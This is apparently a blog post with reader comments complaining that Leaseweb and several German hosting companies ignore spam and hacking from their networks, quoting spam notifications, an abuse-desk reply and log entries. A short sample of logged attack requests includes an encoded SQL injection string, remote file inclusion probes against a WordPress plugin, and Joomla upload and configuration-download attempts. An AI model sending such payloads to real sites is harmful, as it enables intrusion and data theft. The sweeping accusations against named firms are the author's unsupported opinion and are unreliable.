Leaseweb.com: Hosting Spammers and Hacking Scripts

Updated: April 2019

The last months i had thousands of hacking attempts to login to my WordPress admin account. Half of them were from Russia and Ukraine, some from USA, some from UK and MOSTLY from a specific IPs from Germany, belonging to Leaseweb.com.

The last week things got worst and several hundreds of comments were posted to all my WP websites blog posts.

A new comment on the post  is waiting for your approval
Author : diagnosis of diabetes (IP: 46.165.251.155 , hosted-by.leaseweb.com)
E-mail : ezoubros@gmail.com
URL : http://diabetes.adsboards.com/
Whois : http://whois.arin.net/rest/ip/46.165.251.155
Comment:
Thanks for sharing your info. I truly appreciate your efforts and I will be waiting for your next post thanks once again.

A new comment on the post is waiting for your approval
Author : cheap cosmetic surgery (IP: 37.58.52.30 , hosted-by.leaseweb.com)
E-mail :vblwyht@gmail.com
URL    :http://cosmeticsurgery.adsboards.com
Whois  :http://whois.arin.net/rest/ip/37.58.52.30
Comment:
Good info. Lucky me I ran across your site by chance (stumbleupon). I have saved it for later!

I complained several times to abuse@leaseweb.com and abuse@leaseweb.de but all i got was a typical crap reply to provide evidence (!) and complete logs (!). This is not the first time i have such problems with spamming from Leaseweb.de and ALWAYS they do not take any measures about it. Hey … they even ignore spam reports from Spamcop.net.

Apparently they host sites that hack and spam and they don’t care about it. Searching the web i found hundreds of people complaining about the same problems and the same hosting company. Actually i think that most German hosting providers do that, they simply don’t care what kind of websites they host or simply they have no idea what they are doing.

leased-web-germany_1

Now i have blocked with .htaccess all those IPs from leaseweb.de.

Imagine hosting your websites there, among hackers and spammers, what your Google rank will be ….

Other spamming or spammers hosting German companies are:

hetzner.de

strato.de

server4you.de

plusserver.de

intergenia.de

And they are not even accepting spam reports, that is why spammer like to host their site in there. So next time you need for some reason to use a European hosting company, stay AWAY from Germany.

Here is a small sample of what type of attacks we are getting from Leaseweb IPs all over the world (NL, Singapore, US) :

/community/?foro=allread&foro_n=8e50c8a90e%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20–%20%27x%27=%27x

/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.klenzpro.com/wp-content/uploads/2017/03/sold_out.txt&wpaa=echo%20%22h1loo1%22;

/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.tekmat.net/wp-content/uploads/2014/04/jpg.txt&wpaa=phpinfo();

/wwwroot.zip

/index.php?option=com_jdownloads&Itemid=0&view=upload

/index.php?option=com_adsmanager&task=upload&tmpl=component

/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php


You can also discuss this topic in our Forums.

3 thoughts on “Leaseweb.com: Hosting Spammers and Hacking Scripts”

  1. Editor says:

    Recently we have been bombarded by spam again from IPs 81.171.26.164 (email source) for 212.32.243.39 (hosting site), both belonging to NL.Leaseweb.com (Leaseweb Netherlands).

    Our first report was ignored at first, not sure why since all headers etc were provided. Our second report (different spam) was closed as resolved with the following reply from Leaseweb.com Netherlands:

    ____________________________________________________________

    “Dear Sir/ Madam,

    Your abuse notification has been processed and marked as resolved by our customer. LeaseWeb therefore considers this issue as concluded. If you feel our customer has not resolved the original notification or it is not adequately resolved, please inform us by responding to this ticket.

    Please keep in mind the nature of the services LeaseWeb provides. LeaseWeb rents servers with an internet connection to customers and resellers. LeaseWeb does not provide the web software, nor does it configure, host or maintain the websites of its customers or of their customers’ customer. LeaseWeb therefore has no dealings with the content on the servers, nor can it remove, add or change that content. The only person who will be able to do this will be the operator of the website.

    Any illicit activities within a particular LeaseWeb company’s network shall be dealt with solely based on received notifications for such separate LeaseWeb company.

    It is important to note that LeaseWeb is the brand name under which various independent and distinct LeaseWeb companies operate. Each of those companies is a separate and distinct corporate entity that provides services in a particular geographic area. Consequently, each separate LeaseWeb company is actually and legally not able to monitor the data its customers store on or communicate through any other LeaseWeb company’s network.

    Notifications therefore must be made to the correct LeaseWeb entity. In case of new information on the facts your notification has been based on, please submit a new notification via the available abuse routes, which are found at: http://www.leaseweb.com/abuse-prevention

    Thank you for your notification and your co-operation with us.

    Kind regards,

    Abuse Prevention department
    LeaseWeb Global B.V.

    To read more about Abuse Prevention at LeaseWeb, please visit https://www.leaseweb.com/abuse-prevention

    ____________________________________________________________

    So as I understand it, Leaseweb.co tolerates spam and whatever illegal activities, hiding behind their above reply (that THEIR IPs are rented to someone else etc etc).

    Pitty it is hard to totally block ALL their IPs, because they are so many and different.

  2. Alessandro Cagliostro says:

    Again and again and again from their IP 87.236.100.63 (LeaseWeb Netherlands). Spam and Hacking trying to find the password of posters here. I had to clean a lot of comment spam, Thanks to the Shield WP plugin that does most of the job to keep them out.

    https://www.valueweb.gr/wp-content/uploads/2017/11/Shield-Audit-Trail-Viewer-‹-ValueWeb-gr-—-WordPress-5-11-2017.png

    https://www.valueweb.gr/wp-content/uploads/2017/11/87-236-100-63-spam-report-Blacklists-abuse-DB-5-11-2017.png

  3. Johannes de Sacrobosco says:

    And the torture never stops (as Frank Zappa said). We have been hammered daily from their IPs. Hundreds of attacks and all our emails to them have been totally ignored.

    See the log (website names have been edited for privacy reasons)

    +++++

    #: 78368 @: Sat, 17 Dec 2016 01:19:59 -0500

    Host: 5.61.40.178

    IP: 5.61.40.178

    Score: 11

    Violation count: 13

    Why blocked: Leaseweb Network (AS-LEASEWEB-001).

    Query:

    Referer: https://website.com/index.php/admin/

    User Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14

    Reconstructed URL: http:// website.com:443 /index.php/admin/

Leave a Reply

Your email address will not be published. Required fields are marked *